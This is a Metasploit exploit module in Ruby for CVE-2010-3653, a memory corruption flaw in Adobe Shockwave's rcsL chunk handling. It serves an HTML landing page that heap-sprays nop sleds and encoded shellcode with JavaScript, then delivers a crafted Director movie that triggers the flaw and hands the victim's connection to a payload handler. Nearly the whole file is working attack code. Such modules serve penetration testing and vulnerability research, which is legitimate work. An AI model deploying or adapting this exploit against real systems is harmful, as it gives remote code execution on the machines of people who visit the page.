adobe_shockwave_rcsl_corruption.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
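class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #
  # Module metadata. The flaw is the one tracked as CVE-2010-3653 and fixed by
  # Adobe in APSB10-25 (see 'References'). There is a single 'Automatic' target
  # whose 'Ret' (0x0a0a0a0a) matches the 0x0a0a nop fill that the served page
  # places in memory.
  #
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Shockwave rcsL Memory Corruption',
      'Description'    => %q{
          This module exploits a weakness in the Adobe Shockwave player's handling of
        Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented
        rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
      'References'     =>
        [
          [ 'CVE', '2010-3653' ],
          [ 'OSVDB', '68803' ],
          [ 'URL', 'http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-25.html' ]
        ],
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x09\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { 'Ret' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3
        ],
      'DisclosureDate' => 'Oct 21 2010',
      'DefaultTarget'  => 0))
  end

  # Returning false keeps this module out of the framework's automatic
  # exploit selection/filtering.
  def autofilter
    false
  end

  # zlib has to be available before the module is allowed to run.
  def check_dependencies
    use_zlib
  end

  #
  # Load the pre-built Director movie (shockwave_rcsl.dir) from the framework
  # data directory into @dir_data, then let the HTTP server mixin start
  # serving. The .DIR file is a static asset shipped with the framework; this
  # module does not generate or modify it.
  #
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "shockwave_rcsl.dir")
    # File.binread opens in binary mode and always closes the descriptor; the
    # hand-rolled open/read/close it replaces leaked the handle if read raised.
    @dir_data = File.binread(path)
    super
  end

  #
  # Answer one request with one of two responses: the static .DIR movie when
  # the request path contains ".DIR" (case-insensitive), otherwise the HTML
  # page that embeds the movie and pre-fills memory with 0x0a0a nops followed
  # by the encoded payload. Either way the payload handler is invoked after
  # the response is sent.
  #
  # @param cli     [Rex::Socket] the connected client
  # @param request [Rex::Proto::Http::Request] the parsed client request
  #
  def on_request_uri(cli, request)
    # Re-generate the payload; nothing to serve if the framework cannot build one
    return unless regenerate_payload(cli)

    # Randomize the movie URL and the name of the JavaScript payload variable
    dirname        = "#{get_resource}/#{rand_text_alpha(rand(20))}"
    shellcode_rand = rand_text_alpha(rand(20))

    # Payload as a %uXXXX-escaped string in the target's byte order
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Build the landing page; the heredoc body is sent to the client verbatim
    content = <<-EOS
<html>
<head>
<title>msf</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
#{shellcode_rand} = unescape('#{shellcode}');
nops=unescape('%u0a0a%u0a0a');
headersize =20;
slackspace= headersize + #{shellcode_rand}.length;
while(nops.length< slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x200000) block= block+ block+ fillblock;
memory=new Array();
for( counter=0; counter<200; counter++) memory[counter]= block + #{shellcode_rand};
</script>
</head>
<body bgColor="#FFFFFF">
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=11,5,0,593"
ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=src value="#{dirname}.DIR">
<param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ">
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true'
swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedia.com/shockwave/download/"></embed>
</object>
</body>
</html>
    EOS

    # Route on the request path: the movie itself or the page that embeds it
    if request.uri =~ /\.DIR/i
      print_status("Sending exploit DIR")
      send_response(cli, @dir_data, { 'Content-Type' => 'application/octet-stream' })
    else
      print_status("Sending HTML")
      send_response_html(cli, content)
    end

    # Hand the connection to the payload handler
    handler(cli)
  end
end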